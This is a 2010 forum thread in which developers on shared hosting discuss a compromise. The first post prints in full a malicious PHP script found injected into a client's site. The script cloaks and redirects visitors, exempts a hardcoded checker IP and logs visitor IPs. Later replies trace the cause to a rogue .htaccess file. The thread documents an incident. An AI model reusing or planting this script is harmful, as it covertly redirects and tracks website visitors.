MattyboyPHP Posted December 23, 2010 Share Posted December 23, 2010 A client's website was running fine. Suddenly the code below appears instead of their website. Caveats: it works fine on a Mac. Some PC users see the code and others do not. If you hit the refresh button, the website reappears. Has anyone seen this code before? Thanks. <? $google="http://google.com"; $checker_ip="212.117.164.85"; $_SERVER['REMOTE_ADDR']=explode(", ",$_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR']=$_SERVER['REMOTE_ADDR'][0]; // --------------------------------------------------------------------- $time=@date(DATE_RFC822); $host=$_SERVER['HTTP_X_FORWARDED_HOST']; $file= @date("Y-m-d_h"); // --------------------------------------------------------------------- // if not set HTTP_X_FORWARDED_HOST || domain name if(!$host)exit(header("Location:{$google}")); // if not set REAL IP if(!$_SERVER['HTTP_X_FORWARDED_FOR'])exit(header("Location:{$google}")); // --------------------------------------------------------------------- $IP = "{$_SERVER[REMOTE_ADDR]}.log"; function _log() { global $IP; touch (".tmp/{$IP}"); } function _check() { global $IP; if(!file_exists(".tmp/{$IP}")) return true; } if(!_check() && $_SERVER['REMOTE_ADDR'] != $checker_ip) { if(!$host)exit(header("Location:{$google}")); if(!$_SERVER['HTTP_X_FORWARDED_FOR'])exit(header("Location:{$host}")); exit(header("Location:http://{$host}")); } _log(); // --------------------------------------------------------------------- if ( strpos($host, "thedetroitbureau.com") === false) wr_file_a("logs/{$file}", $time. " > ".$host. " > " .$_SERVER[REMOTE_ADDR]. "\n"); // --------------------------------------------------------------------- echo file_get_contents( "cisco.htm" ); function wr_file_a($fname, $content) { if(strlen($content) == 0) return 0; $fpp = @fopen($fname, "a+"); if ($fpp) { @flock($fpp, LOCK_EX); @fwrite($fpp, $content); @flock($fpp, LOCK_UN); @fclose($fpp); return 1; } return 0; } Quote Link to comment Share on other sites More sharing options...
Pikachu2000 Posted December 23, 2010 Share Posted December 23, 2010 Does that code belong to them? If it does, what are the chances that short open tags were recently disabled in the server's php.ini? Quote Link to comment Share on other sites More sharing options...
MattyboyPHP Posted December 23, 2010 Author Share Posted December 23, 2010 No one knows where the code is from or why it suddenly appeared. The website is pure xhtml and css. I've run it off of my server and it's fine. Is this something to take up with the web hosting company? Why would anyone change the php.ini? Quote Link to comment Share on other sites More sharing options...
harvey Posted December 27, 2010 Share Posted December 27, 2010 My website recently showed the same symptoms. I noticed that this code appears only with IE, not with Firefox. Currently my webhost is looking into the possibility that this is a code injection. Quote Link to comment Share on other sites More sharing options...
716Studio Posted December 29, 2010 Share Posted December 29, 2010 Same thing happened to us. We have a support ticket out for this with Network Solutions, hope to hear back soon. What stinks is that it applies to EVERY domain that we're hosting through that account, so everyone is down. Quote Link to comment Share on other sites More sharing options...
harvey Posted December 29, 2010 Share Posted December 29, 2010 Network Solutions corrected the problem in about 24 hours. I got this reply: "Dear ____ I removed the malicious code that was placed in your account causing the issue. I apologize for any inconvenience this issue caused. If you have any other questions please visit our comprehensive support section at http://www.networksolutions.com/support/ or contact our Support Center and refer to Service Request ____ and a specialist will be happy to further assist you and ensure that we completely resolve your issue as quickly as possible." Since I don't think this was a problem in my code, I asked for more details from Network Solutions. No response so far. Quote Link to comment Share on other sites More sharing options...
716Studio Posted December 29, 2010 Share Posted December 29, 2010 Just got off the phone with "tech" support at NS. He told me that it a Google app had been hacked and therefore there was nothing they could do about it, and that "they cannot re-write my code for me." After turning quite red, I thanked him and hung up. I hope that I get a similar answer to what you got from the help ticket I opened up Quote Link to comment Share on other sites More sharing options...
harvey Posted December 29, 2010 Share Posted December 29, 2010 If you call them back, you have my permission to refer to my Service Request 1-498655279 - in which the same symptoms were exhibited, and which Network Solutions resolved. Quote Link to comment Share on other sites More sharing options...
716Studio Posted December 30, 2010 Share Posted December 30, 2010 Soooo, I'm an impatient SOB. I searched for "code injection" and got some ideas, AND, low and behold: I looked in the root of my hosting package (htdocs, in this case for NS, could be public_html, etc. for cpanel users) and found an alien .htaccess file that shouldn't have been there. I deleted it and magic happened. All of my sites are back up and running. Ps - Thank you for providing your service ticket Harvey, I did open another ticket with that reference so hopefully they can expedite service in the future. I hope this helps anyone else with this problem. Quote Link to comment Share on other sites More sharing options...
MattyboyPHP Posted December 30, 2010 Author Share Posted December 30, 2010 Thanks for all these responses. I am really surprised, but I suppose I shouldn't be. My client's site is also hosted by NS. This is the 2nd time their htaccess file has been hacked. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.